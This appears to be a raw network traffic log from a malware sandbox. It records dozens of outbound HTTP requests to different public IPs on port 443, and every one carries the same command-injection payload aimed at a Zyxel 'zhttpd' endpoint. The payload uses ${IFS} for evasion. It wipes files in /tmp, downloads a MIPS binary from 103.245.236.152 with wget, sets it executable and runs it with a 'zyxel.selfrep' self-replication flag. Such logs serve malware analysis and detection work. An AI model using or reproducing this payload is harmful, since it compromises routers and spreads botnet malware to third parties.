                                        Jan 14, 2024 16:18:54.689461946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7062192.168.2.133773066.91.239.5443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.689491034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7063192.168.2.1341342213.239.93.25443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.689502954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7064192.168.2.1342956219.250.220.52443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.689563036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7065192.168.2.1349572138.87.31.224443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.689609051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7066192.168.2.1348546196.47.57.191443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.689650059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7067192.168.2.135775869.125.94.218443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.689680099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7068192.168.2.1350780217.94.203.47443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.689722061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7069192.168.2.1360584185.237.104.247443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.689758062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7070192.168.2.1345998150.233.7.127443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.689807892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7071192.168.2.1344946102.58.64.189443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.689853907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7072192.168.2.1359558114.251.148.75443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.689873934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7073192.168.2.1350540162.179.103.237443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.689935923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7074192.168.2.1347960211.163.98.38443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.689969063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7075192.168.2.135849483.126.172.26443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.690004110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7076192.168.2.133472084.31.183.69443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.690051079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7077192.168.2.1358536114.117.237.199443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.690092087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7078192.168.2.1358176217.235.230.85443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.690125942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7079192.168.2.1346666197.26.233.224443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.690165043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7080192.168.2.1354394180.189.208.242443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.690196991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7081192.168.2.1334954111.30.10.38443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.690246105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7082192.168.2.1348190179.76.200.162443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.690270901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7083192.168.2.1358258123.56.250.220443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.690313101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7084192.168.2.13464542.188.230.81443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.690371037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7085192.168.2.1344028174.14.148.130443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.690422058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7086192.168.2.134783437.80.41.223443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.690464020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7087192.168.2.1345514154.21.106.163443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.690505028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7088192.168.2.134260846.238.146.240443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.694001913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7089192.168.2.1343926152.152.17.153443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.694024086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7090192.168.2.1359156151.51.177.25443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.694093943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7091192.168.2.1337350120.191.134.82443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.702866077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7092192.168.2.134977262.218.7.7443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.702913046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7093192.168.2.134959676.175.130.102443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.702960014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7094192.168.2.1354130107.110.137.62443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.703001022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7095192.168.2.134772812.55.171.120443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.703041077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7096192.168.2.1337658204.177.149.218443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.703075886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7097192.168.2.1352896116.125.146.219443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.703114986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7098192.168.2.1339596194.136.163.29443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.703161955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7099192.168.2.1359506189.139.92.119443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.703214884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7100192.168.2.135363468.221.160.79443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.703241110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7101192.168.2.135673487.125.101.203443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.703295946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7102192.168.2.1339658199.243.32.221443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.703342915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7103192.168.2.1350496131.153.167.53443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.703391075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7104192.168.2.133499624.71.86.205443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.703434944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7105192.168.2.134149690.31.130.33443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.703466892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7106192.168.2.1340382102.31.49.220443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.703514099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7107192.168.2.135192074.152.17.51443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.703568935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7108192.168.2.1338056202.138.108.74443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.703612089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7109192.168.2.1344402207.238.56.62443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.703669071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7110192.168.2.134730841.192.0.135443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.703701973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7111192.168.2.1339324134.172.86.166443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.703756094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7112192.168.2.135538244.23.48.84443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.703774929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7113192.168.2.1354318105.120.235.9443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.703803062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7114192.168.2.133829275.190.104.23443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.703830004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7115192.168.2.133579413.76.33.44443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.703876972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7116192.168.2.135459861.202.193.230443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.703937054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7117192.168.2.1359016106.154.253.169443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.703989029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7118192.168.2.1353724204.212.28.223443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.704041004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7119192.168.2.135518635.24.67.33443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.704063892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7120192.168.2.1349556142.179.197.138443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.704097033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7121192.168.2.133318618.31.11.252443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.704130888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7122192.168.2.1352586106.213.103.113443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.704178095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7123192.168.2.1335386185.184.7.98443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:55.704205036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7124192.168.2.1343130120.203.130.3443
                                        TimestampBytes transferredDirectionData
